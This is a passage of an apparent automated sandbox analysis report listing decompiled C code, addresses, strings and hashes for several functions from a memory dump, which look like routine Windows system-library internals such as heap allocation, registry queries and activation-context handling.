							_t109 = L02974620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0299F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E029995D0();
										L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0298f0d3
0x0298f0d9
0x0298f0e0
0x0298f0e7
0x0298f0f2
0x0298f0f4
0x0298f0f8
0x0298f100
0x0298f108
0x0298f10d
0x0298f115
0x0298f116
0x0298f11f
0x0298f123
0x0298f124
0x0298f12c
0x0298f130
0x0298f134
0x0298f13d
0x0298f144
0x0298f14b
0x0298f152
0x029cbab0
0x029cbab0
0x0298f158
0x0298f158
0x0298f15a
0x0298f160
0x0298f165
0x0298f166
0x0298f16f
0x0298f173
0x029cbaa7
0x029cbaa7
0x029cbaab
0x00000000
0x0298f179
0x0298f18d
0x0298f191
0x029cbaa2
0x00000000
0x0298f197
0x0298f19b
0x0298f1a2
0x0298f1a9
0x0298f1af
0x0298f1b2
0x0298f1b6
0x0298f1b9
0x0298f1c4
0x0298f1d8
0x0298f1df
0x0298f1e3
0x0298f1eb
0x0298f1ee
0x0298f1f4
0x0298f20f
0x029cbab7
0x029cbabb
0x029cbacc
0x029cbad1
0x0298f215
0x0298f218
0x0298f226
0x0298f22b
0x00000000
0x0298f22b
0x0298f1f6
0x0298f1f6
0x0298f1f9
0x0298f1fb
0x0298f1fb
0x0298f1f4
0x0298f191
0x0298f173
0x0298f152
0x0298f203

Strings

@, xrefs: 0298F124

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 174d58860faba39da40bf3fd0e137d8f3d3c47b08ff5669b8e0a2c4c13e7b1a0
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: FB519E72604710AFD320DF19C841A6BB7F9FF88714F10892DF99597690E7B4E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 029D3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E029D3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x2a4d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E02990BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E029D3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0299FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E029D3540;
						E0299FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E029ADDD0( &_v1072, _t75, _t79, _t80, _t81);
						E029E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E029997C0();
					}
					return E0299B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E029D3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E029D3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0299FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E02999650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E029D3787(_a4,  &_v352, _t80);
						}
					}
					L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E029995D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x029d3552
0x029d355a
0x029d355d
0x029d3566
0x029d3567
0x029d357e
0x029d358f
0x029d35a1
0x029d35a5
0x029d366b
0x029d366b
0x029d366d
0x029d3672
0x029d3679
0x029d3685
0x029d368d
0x029d369d
0x029d36a7
0x029d36b8
0x029d36c6
0x029d36c7
0x029d36dc
0x029d36e1
0x029d36e7
0x029d36e9
0x029d36e9
0x029d3703
0x029d3703
0x029d35b5
0x029d35c0
0x029d35c4
0x00000000
0x00000000
0x029d35ca
0x029d35d7
0x029d35e2
0x029d35e6
0x029d35e8
0x029d35f5
0x029d35fa
0x029d3603
0x029d3604
0x029d3609
0x029d360a
0x029d3612
0x029d3613
0x029d361e
0x029d3622
0x029d3628
0x029d362f
0x029d362f
0x029d3636
0x029d3638
0x029d363b
0x029d3642
0x029d3642
0x029d3636
0x029d3657
0x029d3657
0x029d365c
0x029d3662
0x029d3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 029D358F

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 84e3776f9a3125ec2f046c83c66d912e9a05df371c613878215a39cb130cd9af
Instruction ID: 540fdb02bf26ae41184f2c94095e6e0f4520dd8a63706f4c86623665ecb1615e
Opcode Fuzzy Hash: 84e3776f9a3125ec2f046c83c66d912e9a05df371c613878215a39cb130cd9af
Instruction Fuzzy Hash: 624166B5D0152C9BDF21DA54CC81FDEB77DAB44715F0085E5EA09A7240DB309E88CF99

Uniqueness

Uniqueness Score: -1.00%

Function 02A205AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E02A205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E02A207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E02999730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E02A1A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E02A1A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E02A21293(_t79, _v40, E02A207DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E02977D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E02A1138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x02a205c5
0x02a205ca
0x02a205d3
0x02a206db
0x02a206db
0x02a206dd
0x02a206e3
0x02a206e3
0x02a205dd
0x02a205e7
0x02a205f6
0x02a20600
0x02a20607
0x02a20610
0x02a20615
0x02a2061a
0x02a2061c
0x02a2061e
0x02a20624
0x02a20625
0x02a20627
0x02a20628
0x02a20631
0x02a20640
0x02a2064d
0x02a20654
0x02a20654
0x02a20631
0x02a2066d
0x02a20674
0x00000000
0x00000000
0x02a20692
0x02a2069e
0x02a206b0
0x02a206a0
0x02a206a9
0x02a206a9
0x02a206b8
0x02a206d6
0x02a206d6
0x00000000

Strings

`, xrefs: 02A20633

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 96dd3ca5c7f092b85de4e6ceca42f7c04f174ad66a3277b07a1a6d10f13c735d
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: B731A5326047656BE710DF19CD85F9777D9ABC4754F044125F9549B280DBB0E908CB91

Uniqueness

Uniqueness Score: -1.00%

Function 029D3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E029D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E02999650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L02974620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E02999650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x029d3893
0x029d3896
0x029d3899
0x029d389f
0x029d38a0
0x029d38a4
0x029d38a9
0x029d38ac
0x029d38ad
0x029d38ae
0x029d38af
0x029d38b1
0x029d38b4
0x029d38bb
0x029d38bc
0x029d38bd
0x029d38c4
0x029d38c8
0x029d38ca
0x029d38ca
0x029d38d5
0x029d393e
0x029d3940
0x029d3942
0x029d3952
0x029d3954
0x029d3961
0x029d3961
0x029d3967
0x029d396e
0x029d396e
0x029d3947
0x029d394c
0x00000000
0x029d394c
0x029d38ea
0x029d38ee
0x029d38f8
0x029d38f9
0x029d38ff
0x029d3900
0x029d3902
0x029d3903
0x029d390b
0x029d390f
0x029d3950
0x00000000
0x029d3950
0x029d3915
0x029d391d
0x029d391d
0x029d3922
0x029d3926
0x00000000
0x029d3928
0x029d392b
0x029d392b
0x029d3935
0x029d3937
0x029d3937
0x00000000
0x029d3935
0x029d3926
0x029d38f0
0x00000000

Strings

BinaryName, xrefs: 029D38B4

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 25c1b43fa4d36277411b286e16f7af0b500b52c37d1315ccad1dfa148d1edd14
Instruction ID: 2418ed048f32b4041017aa47260c08d6dda811b4aff0a619d850b40a989f0f8b
Opcode Fuzzy Hash: 25c1b43fa4d36277411b286e16f7af0b500b52c37d1315ccad1dfa148d1edd14
Instruction Fuzzy Hash: FA310332D0050AEFEB15DB58C945E6FB778EB80B60F0181A9ED04A7240D7309E00DFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0298D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0298D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2a4d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E02974120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0299B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E029998D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E029995D0();
					L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0298d29c
0x0298d2a6
0x0298d2b1
0x0298d2b5
0x0298d2b6
0x0298d2bc
0x0298d2bd
0x0298d2be
0x0298d2bf
0x0298d2c2
0x0298d2c4
0x0298d2cc
0x0298d384
0x0298d34b
0x0298d34f
0x0298d350
0x0298d351
0x0298d35c
0x0298d35c
0x0298d2d6
0x0298d2da
0x0298d2e1
0x0298d361
0x0298d369
0x0298d36d
0x0298d2e3
0x0298d2e3
0x0298d2e3
0x0298d2e5
0x0298d2ed
0x0298d2f5
0x0298d2fa
0x0298d302
0x0298d303
0x0298d30b
0x0298d30f
0x0298d313
0x0298d318
0x0298d31c
0x0298d320
0x0298d379
0x0298d37d
0x00000000
0x00000000
0x029caffe
0x029cb001
0x029cb011
0x00000000
0x0298d322
0x0298d322
0x0298d330
0x0298d337
0x0298d35d
0x0298d339
0x0298d33f
0x0298d38c
0x0298d38c
0x0298d33f
0x0298d349
0x00000000
0x0298d349

Strings

@, xrefs: 0298D303

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 41fed625de5ba941dadde8169e552498806d088161f04d984af5952bed495849
Instruction ID: 2b206759d77a7d868c206576212698e74467848d5b539d229f1b778b0dd39a87
Opcode Fuzzy Hash: 41fed625de5ba941dadde8169e552498806d088161f04d984af5952bed495849
Instruction Fuzzy Hash: 203191B15483059FC711EF28C980A6BBBE9EBC5758F04092EF99593290D734DD05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02961B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E02961B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0299BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0299A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0299A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L02974620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x02961b8f
0x02961b9a
0x02961b9c
0x02961b9e
0x02961ba3
0x029b7010
0x029b7010
0x00000000
0x02961ba9
0x02961ba9
0x02961bae
0x00000000
0x02961bc5
0x02961bca
0x02961bcf
0x02961bd0
0x02961bd1
0x02961bd2
0x02961bd6
0x02961bdc
0x02961be0
0x029b6ffc
0x029b7000
0x00000000
0x029b7006
0x029b7009
0x029b7009
0x02961be6
0x02961bec
0x02961c0b
0x02961c0b
0x02961c0c
0x02961c11
0x02961c12
0x02961c15
0x02961c1b
0x02961c1f
0x02961c31
0x02961c33
0x029b7026
0x029b7026
0x02961c21
0x02961c24
0x02961c24
0x02961bee
0x02961bee
0x02961bf2
0x02961c3a
0x02961bf4
0x02961bf4
0x02961c05
0x02961c05
0x02961c09
0x02961c3e
0x00000000
0x00000000
0x00000000
0x02961c09
0x02961bec
0x02961be0
0x02961bae
0x02961c2e

Strings

WindowsExcludedProcs, xrefs: 02961BC5

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 68c0df9548c13988b4ab1f695adf2ebb94d8ed34f59d97a7acff05e219fd4cec
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7321C877501518ABCB229A99C944FBFB7EEEF81655F054566F9089B300D734DD00EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0297F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0297F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0297f71d
0x0297f722
0x0297f726
0x029c4770
0x0297f765
0x0297f769
0x0297f769
0x0297f732
0x029c477a
0x00000000
0x029c477a
0x0297f738
0x0297f73a
0x0297f73c
0x0297f73f
0x0297f746
0x0297f778
0x0297f7a9
0x0297f7a9
0x0297f754
0x0297f75a
0x0297f75d
0x0297f75f
0x0297f761
0x0297f76f
0x0297f771
0x0297f771
0x0297f76f
0x0297f763
0x00000000
0x0297f763
0x0297f77d
0x0297f7a3
0x0297f7a5
0x00000000
0x0297f7a5
0x0297f77f
0x0297f782
0x0297f784
0x0297f786
0x00000000
0x00000000
0x00000000
0x0297f788
0x0297f748
0x0297f74d
0x0297f78d
0x0297f793
0x0297f7b7
0x0297f7bc
0x00000000
0x0297f7bc
0x0297f798
0x00000000
0x00000000
0x0297f79d
0x0297f7b0
0x00000000
0x0297f7b0
0x0297f79f
0x00000000
0x0297f74f
0x0297f74f
0x00000000
0x0297f74f

Strings

Actx , xrefs: 0297F73F

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 92c634b1d6d035a282aba3068279edf82cf28077f4c98f25117d6d0ea1b409c1
Instruction ID: 1c5476658727c6c967f22479ba6a75c85a32f22f35569ba18f20c6d639c4bcee
Opcode Fuzzy Hash: 92c634b1d6d035a282aba3068279edf82cf28077f4c98f25117d6d0ea1b409c1
Instruction Fuzzy Hash: 0211C435308B02CBEB244E1D889173672DDEB95728F25493EE465FBB91EB70C840C741

Uniqueness

Uniqueness Score: -1.00%

Function 02A08DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E02A08DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x2a30d50);
				E029AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E029E5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E029ADEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E029ADEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E029AD130(_t34, _t39, _t40);
			}

0x02a08df1
0x02a08df1
0x02a08df1
0x02a08df1
0x02a08df1
0x02a08df1
0x02a08df3
0x02a08df8
0x02a08dfd
0x02a08e00
0x02a08e0e
0x02a08e2a
0x02a08e36
0x02a08e38
0x02a08e3c
0x02a08e46
0x02a08e46
0x02a08e36
0x02a08e50
0x02a08e56
0x02a08e59
0x02a08e5c
0x02a08e60
0x02a08e67
0x02a08e6d
0x02a08e73
0x02a08e74
0x02a08eb1
0x02a08ebd

Strings

Critical error detected %lx, xrefs: 02A08E21

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 1bb75f5be2898743d6018db49e0e53d2570928b965b176621e0228a799ed1e6f
Instruction ID: 0eb8696dfc7df377b1ea41b1380d4fec3ae3882aa1cfe3607a66c000860aa3ef
Opcode Fuzzy Hash: 1bb75f5be2898743d6018db49e0e53d2570928b965b176621e0228a799ed1e6f
Instruction Fuzzy Hash: 19117975D00348DEEF25CFA4994579DBBB1BB08714F20425ED029AB2C1CB344601CF28

Uniqueness

Uniqueness Score: -1.00%

Function 02A25BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E02A25BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
